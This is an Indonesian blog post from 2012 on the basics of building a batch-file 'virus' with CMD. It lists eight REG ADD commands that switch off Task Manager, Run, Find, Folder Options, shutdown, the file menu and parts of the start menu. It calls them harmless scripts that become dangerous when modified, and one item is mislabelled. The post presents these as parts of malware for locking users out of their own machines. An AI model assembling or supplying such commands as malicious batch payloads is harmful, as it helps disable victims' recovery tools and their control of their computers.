Headlines News :
Home » » Dasar membuat virus dengan CMD

Dasar membuat virus dengan CMD

Written By nAmmAsttE on Rabu, 28 Maret 2012 | 03.31

dasar - dasar pembuatan virus CMD atau biasa di kenal dengan Virus
.Bat. Sebenarnya ini bukan virus sie!!! melainkan code - code script
biasa tapi bila di modifikasi dengan benar code tersebut dapat menjadi
sangat berbahaya, dan orang - orang menyebutnya VIRUS.. hehehe..

Baiklah mari kita lihat code - code di bawah ini berikut dengan penjelasan dan ke gunaannya :

1. Disable taks Manager / CTRL + ALT + DEL
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
 2. Disable Folder Options
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
3. Disable Run

REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v norun /t reg_dword /d 1 /f
4. Disable Find

REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nofind /t reg_dword /d 1 /f
5. Disable Start Menu List

reg ADD HKLM\Software\Microsoft\Windows\Currentversion\Policies\explorer /v Nostartmenupinnedlist /t reg_dword /d 1 /f
6. Disable Shutdown

REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v noclose /t reg_dword /d 1 /f
7. Disable File Menu

REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nofilemenu /t reg_dword /d 1 /f
8. Disable Folder Options

reg ADD HKCU\Software\Microsoft\Windows\Currentversion\Policies\explorer /v nostartmenumoreprograms /t reg_dword /d 1 /f
Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Random Post

 
Support : Creating Website | Tom Template | Tom Template
Copyright © 2011. NAMMASTTE - All Rights Reserved
Template Created by Creating Website Published by TomTom Template
Proudly powered by Blogger